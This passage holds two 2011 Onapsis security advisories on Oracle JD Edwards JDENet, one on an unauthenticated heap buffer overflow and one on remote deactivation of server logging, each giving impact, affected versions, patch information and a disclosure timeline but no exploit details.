By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to   access or modify all the business information processed by the ERP 
system.
This would result in the total compromise of the ERP infrastructure.

-- Risk Level:  High


2. Advisory Information
===

-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-11

-- Onapsis SVS ID: ONAPSIS-00018

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information


-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne  Tools 8.98
( older versions might be also affected)

-- Vulnerability Class: Memory corruption

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-11


4. Affected Components Description
==

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details


If a packet of a specific size is sent to the JDENet Service, a heap based 
buffer overflow condition is raised.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch their 
systems and protect against the exploitation of the
described vulnerability.


6. Solution
===

Apply Oracle Critical Patch update April – 2010. More information available on 
http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
Onapsis strongly recommends Oracle customers to download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
business critical systems and applications.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved in this 
special team lead the public research trends in this matter, having discovered 
and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality of our 
solutions and enabling our customers to be protected from the latest risks to 
their critical business information.

Furthermore, the results of this research projects are usually shared with the 
general security and professional community, encouraging the sharing of 
information and increasing the common knowledge in this field.


About Onapsis
=

Onapsis is the leading provider of solutions for the security of ERP and 
business-critical systems and applications. Through different innovative 
products and services, Onapsis helps its global customers to effectively 
increase the security level of their core business platforms, protecting their 
information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the ERP security 
field, with several years of experience in the assessment and protection of 
critical platforms in world-wide customers, such as
Fortune-500 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated 
Security & Compliance Audits, Vulnerability Assessments and Penetration Tests 
over their SAP platform, helping them enforce compliance requirements, decrease 
financial fraud risks an reduce audit costs drastically.

Some of our featured services include SAP Penetration Testing, SAP Gateway & 
RFC security, SAP Enterprise Portal security assessment, Securi

[Full-disclosure] [Onapsis Security Advisory 2011-010] Oracle JD Edwards JDENET Remote Logging Deactivation

[Onapsis Research Labs]

Onapsis Security Advisory 2011-010: Oracle JD Edwards JDENET Remote Logging 
Deactivation

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well as exclusive access 
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker would be 
able to disable logging capabilities in the JD Edwards server.
This could result in malicious activities becoming untraceable on the ERP 
Server.

-- Risk Level:  Medium


2. Advisory Information
===
-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-10

-- Onapsis SVS ID: ONAPSIS-00025

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information


-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne  Tools 8.98
( older versions might be also affected)

-- Vulnerability Class: Unauthenticated functionality

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-10


4. Affected Components Description
==

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details


Several ways remotelly deactivate the kernel processes logging have been 
detected. If specifically crafted messages are sent to the JDENET Service, the 
JDENET Kernel wil stop logging for the kernel processes activities.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch their 
systems and protect against the exploitation of the
described vulnerability.


6. Solution
===

Apply Oracle Critical Patch update April – 2010. More information available on 
http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html

Onapsis strongly recommends Oracle customers to download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
business critical systems and applications.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved in this 
special team lead the public research trends in this matter, having discovered 
and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality of our 
solutions and enabling our customers to be protected from the latest risks to 
their critical business information.

Furthermore, the results of this research projects are usually shared with the 
general security and professional community, encouraging the sharing of 
information and increasing the common knowledge in this field.


About Onapsis
=

Onapsis is the leading provider of solutions for the security of ERP and 
business-critical systems and applications. Through different innovative 
products and services, Onapsis helps its global customers to effectively 
increase the security level of their core business platforms, protecting their 
information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the ERP security 
field, with several years of experience in the assessment and protection of 
critical platforms in world-wide customers, such as
Fortune-500 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated 
Security & Compliance Audits, Vulnerability Assessments and Penetration Tests 
over their SAP platform, helping them enforce compliance requirements, decrease 
financial fraud risks an reduce audit costs drastically.

Some of our